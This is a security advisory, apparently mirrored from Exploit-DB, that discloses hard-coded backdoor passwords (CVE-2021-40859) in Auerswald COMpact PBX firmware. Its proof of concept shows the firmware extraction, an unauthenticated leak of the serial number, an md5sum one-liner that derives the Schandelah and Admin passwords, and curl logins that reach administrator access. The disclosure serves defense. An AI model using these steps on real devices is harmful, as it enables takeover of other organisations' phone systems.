Auerswald COMpact 8.0B – Multiple Backdoors

• Exploit Database
• 19 阅读

• 作者： RedTeam Pentesting GmbH
  日期： 2021-12-06
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50569/

• # Exploit Title: Auerswald COMpact 8.0B - Multiple Backdoors
  # Date: 06/12/2021
  # Exploit Author: RedTeam Pentesting GmbH
  
  Advisory: Auerswald COMpact Multiple Backdoors
  
  
  RedTeam Pentesting discovered several backdoors in the firmware for the
  Auerswald COMpact 5500R PBX. These backdoors allow attackers who are
  able to access the web-based management application full administrative
  access to the device.
  
  
  Details
  =======
  
  Product: COMpact 3000 ISDN, COMpact 3000 analog, COMpact 3000 VoIP, COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19")
  Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX)), <= 4.0S (COMpact 3000 ISDN, COMpact 3000 analog, COMpact 3000 VoIP)
  Fixed Versions: 8.2B, 4.0T
  Vulnerability Type: Backdoor
  Security Risk: high
  Vendor URL: https://www.auerswald.de/en/product/compact-5500r
  Vendor Status: fixed version released
  Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-007
  Advisory Status: published
  CVE: CVE-2021-40859
  CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40859
  
  
  Introduction
  ============
  
  "Fully modular VoIP appliance for more efficient communication processes
  With the COMpact 5500R, you are originally equipped for everyday
  business - now and in the future.
  
  The fully modular architecture with 80 IP channels and all the functions
  of a large ITC server allows up to 112 subscribers and thus scales with
  your company.
  
  Continuous maintanance and expansion of the system software makes this
  versatile IP server a future-proof investment in any business
  communication."
  
  (from the vendor's homepage)
  
  
  More Details
  ============
  
  Two backdoor passwords were found in the firmware of the COMpact 5500R
  PBX. One backdoor password is for the secret user "Schandelah", the
  other can be used for the highest-privileged user "Admin". No way was
  discovered to disable these backdoors.
  
  
  Proof of Concept
  ================
  
  The firmware for the COMpact 5500R can be downloaded from the vendor's
  homepage[1]. The following details refer to firmware version 7.8A, but
  the latest firmware at the time of writing (8.0B) is affected as well.
  
  Inspecting the downloaded file reveals that it is compressed and can be
  extracted with the program "gunzip":
  
  ------------------------------------------------------------------------
  $ file 7_8A_002_COMpact5500.rom
  7_8A_002_COMpact5500.rom: gzip compressed data, last modified: Wed Sep 23
  15:04:43 2020, from Unix, original size 196976698
  
  $ mv 7_8A_002_COMpact5500.rom 7_8A_002_COMpact5500.gz
  
  $ gunzip 7_8A_002_COMpact5500.gz
  ------------------------------------------------------------------------
  
  Analysing the resulting file again shows that it is an image file in the
  format required by the bootloader "Das U-Boot"[2], a popular bootloader
  for embedded devices:
  
  ------------------------------------------------------------------------
  $ file 7_8A_002_COMpact5500.rom
  
  7_8A_002_COMpact5500.rom: u-boot legacy uImage, CP5500 125850, Linux/ARM,
  Multi-File Image (Not compressed), 196976634 bytes, Wed Sep 23 15:04:38
  2020, Load Address: 0x00000000, Entry Point: 0x00000000, Header CRC: 0
  xCECA93E8, Data CRC: 0x99E65DF1
  ------------------------------------------------------------------------
  
  The program "dumpimage" (included with u-boot) can be used to list the
  partitions in the image file:
  
  ------------------------------------------------------------------------
  $ dumpimage -l 7_8A_002_COMpact5500.rom
  Image Name:
  CP5500 125850
  Created:
  Wed Sep 23 17:04:38 2020
  Image Type:
  ARM Linux Multi-File Image (uncompressed)
  Data Size:
  196976634 Bytes = 192359.99 KiB = 187.85 MiB
  Load Address: 00000000
  Entry Point: 00000000
  Contents:
  Image 0: 512 Bytes = 0.50 KiB = 0.00 MiB
  Image 1: 196976110 Bytes = 192359.48 KiB = 187.85 MiB
  ------------------------------------------------------------------------
  
  The larger partition then was extracted into the file "rootfs" as
  follows:
  
  ------------------------------------------------------------------------
  $ dumpimage -i 7_8A_002_COMpact5500.rom -p 1 rootfs
  ------------------------------------------------------------------------
  
  Contained in the file is an ext2-compatible file system, which was
  mounted at "/mnt" and inspected:
  
  ------------------------------------------------------------------------
  $ file rootfs
  
  rootfs: Linux rev 1.0 ext2 filesystem data, UUID=c3604712-a2ca-412f-81ca-
  f302d7f20ef1, volume name "7.8A_002_125850."
  
  $ sudo mount -o loop,ro rootfs /mnt
  
  $ cat /mnt/etc/passwd
  root::0:0:root:/root:/bin/sh
  netstorage::1:1::/data/ftpd:/bin/false
  web::2:2::/opt/auerswald/lighttpd:/bin/false
  ------------------------------------------------------------------------
  
  The PBX runs the web server lighttpd[3], the configuration files can be
  found in the folder "/opt/auerswald/lighttpd". The web server forwards
  most requests via FastCGI to the program "/opt/auerswald/web/webserver".
  This program can then be analysed, for example using the reverse
  engineering program Ghidra[4].
  
  The manual for the PBX reveals that in order to manage the device, users
  need to log in with the username "sub-admin". When this string is
  searched within the program in Ghidra, the function which checks
  passwords on login can be identified.
  
  It can easily be seen that besides the username "sub-admin" the function
  also checks for the hard-coded username "Schandelah", which is the
  village of Auerswald's headquarter. Further analysis revealed that the
  corresponding password for this username is derived by concatenating the
  PBX's serial number, the string "r2d2" and the current date, hashing it
  with the MD5 hash algorithm and taking the first seven lower-case hex
  chars of the result.
  
  All data needed to derive the password can be accessed without
  authentication by requesting the path "/about_state", which is also used
  on the website the PBX redirects users to who abort the password prompt
  (shortened and formatted to increase readability):
  
  ------------------------------------------------------------------------
  $ curl --include https://192.168.1.2/about_state
  HTTP/1.1 200 OK
  Content-Type: application/json; charset=utf-8;
  [...]
  
  {
  "pbx": "COMpact 5500R",
  "pbxType": 35,
  "pbxId": 0,
  "version": "Version 7.8A - Build 002",
  "serial": "1234123412",
  "date": "30.08.2021",
  [...]
  }
  ------------------------------------------------------------------------
  
  The password can be derived as follows:
  
  ------------------------------------------------------------------------
  $ echo -n 1234123412r2d230.08.2021 | md5sum | egrep -o '^.{7}'
  1432d89
  ------------------------------------------------------------------------
  
  This password can then be used for authentication:
  
  ------------------------------------------------------------------------
  $ curl --include --user 'Schandelah:1432d89' --anyauth \
  https://192.168.1.2/tree
  
  HTTP/1.1 302 Found
  Location: /statics/html/page_servicetools.html
  Set-Cookie: AUERSessionID1234123412=AXCTMGGCCUAGBSE; HttpOnly; Path=/
  [...]
  ------------------------------------------------------------------------
  
  Next, the endpoint "/logstatus_state" can be queried using the returned
  session ID to check the access level:
  
  ------------------------------------------------------------------------
  % curl --cookie 'AUERSessionID1234123412=AXCTMGGCCUAGBSE' --include \
  https://192.168.1.2/logstatus_state
  
  HTTP/1.1 200 OK
  X-XSS-Protection: 1
  Content-Type: application/json; charset=utf-8;
  [...]
  
  {"logstatus":"Haendler"}
  ------------------------------------------------------------------------
  
  The returned access level is "Haendler" (reseller). After login, the web
  server redirects to a special service page at the path
  "/statics/html/page_servicetools.html". Among other things, it allows to
  download a backup of all data on the device, configure audio recording
  and reset the password, PIN and token for the user "Admin". Accessing
  regular administrative functions is not possible directly with this user
  account.
  
  When inspecting the password checking function, a second backdoor can be
  found. When the username "Admin" is specified, the given password is
  tested against the configured password as well as a password derived in
  a similar way from the PBX's serial number, the string "r2d2", the
  current date and the configured language. The MD5 hash is taken and the
  specified password is tested against the first seven characters of the
  lower case hexadecimal hash.
  
  The backdoor password for the "Admin" user can be calculated as follows:
  
  ------------------------------------------------------------------------
  $ echo -n 1234123412r2d230.08.2021DE | md5sum | egrep -o '^.{7}'
  92fcdd9
  ------------------------------------------------------------------------
  
  The server returns a session ID for that password and the username
  "Admin":
  
  ------------------------------------------------------------------------
  $ curl --user 'Admin:92fcdd9' --anyauth --include \
  https://192.168.1.2/tree
  
  HTTP/1.1 200 OK
  Content-Type: application/json; charset=utf-8;
  Set-Cookie: AUERSessionID1234123412=MLJHCDLPMXPNKWY; HttpOnly; Path=/
  [...]
  
  [{"login":3,"userId":0,"userName":"",[...]}]
  ------------------------------------------------------------------------
  
  Checking the access level of the session reveals the status
  "Administrator":
  
  ------------------------------------------------------------------------
  $ curl --cookie 'AUERSessionID1234123412=MLJHCDLPMXPNKWY' --include \
  https://192.168.1.2/logstatus_state
  
  HTTP/1.1 200 OK
  Content-Type: application/json; charset=utf-8;
  [...]
  
  {"logstatus":"Administrator"}
  ------------------------------------------------------------------------
  
  
  Workaround
  ==========
  
  Disable or restrict access to the web-based management interface if
  possible.
  
  
  Fix
  ===
  
  Upgrade to a firmware version which corrects this vulnerability.
  
  
  Security Risk
  =============
  
  By inspecting the firmware for the COMpact 5500R PBX, attackers can
  easily discover two backdoor passwords. One password is for the secret
  user account with the username "Schandelah", the other works as an
  alternative password for the user "Admin". Using the backdoor, attackers
  are granted access to the PBX with the highest privileges, enabling them
  to completely compromise the device. The passwords are derived from the
  serial number, the current date and the configured language.
  
  The backdoor passwords are not documented. They secretly coexist with a
  documented password recovery function supported by the vendor. No way
  was found to disable the backdoor access.
  
  All information needed to derive the passwords can be requested over the
  network without authentication, so attackers only require network access
  to the web-based management interface.
  
  Due to the ease of exploitation and severe consequences, the backdoor
  passwords are rated as a high risk.
  
  
  Timeline
  ========
  
  2021-08-26 Vulnerability identified
  2021-09-01 Customer approved disclosure to vendor
  2021-09-10 Vendor notified
  2021-09-10 CVE ID requested
  2021-09-10 CVE ID assigned
  2021-10-05 Vendor provides access to device with fixed firmware
  2021-10-11 Vendor provides fixed firmware
  2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected
  2021-12-06 Advisory published
  
  
  References
  ==========
  
  [1] https://www.auerswald.de/de/support/download/firmware-compact-5500
  [2] https://www.denx.de/wiki/U-Boot
  [3] https://www.lighttpd.net
  [4] https://ghidra-sre.org
  
  
  RedTeam Pentesting GmbH
  =======================
  
  RedTeam Pentesting offers individual penetration tests performed by a
  team of specialised IT-security experts. Hereby, security weaknesses in
  company networks or products are uncovered and can be fixed immediately.
  
  As there are only few experts in this field, RedTeam Pentesting wants to
  share its knowledge and enhance the public knowledge with research in
  security-related areas. The results are made available as public
  security advisories.
  
  More information about RedTeam Pentesting can be found at:
  https://www.redteam-pentesting.de/
  
  
  Working at RedTeam Pentesting
  =============================
  
  RedTeam Pentesting is looking for penetration testers to join our team
  in Aachen, Germany. If you are interested please visit:
  https://www.redteam-pentesting.de/jobs/
  
  
  -- 
  RedTeam Pentesting GmbH Tel.: +49 241 510081-0
  Dennewartstr. 25-27 Fax : +49 241 510081-99
  52068 Aachenhttps://www.redteam-pentesting.de
  Germany Registergericht: Aachen HRB 14004
  Geschäftsführer: Patrick Hof, Jens Liebchen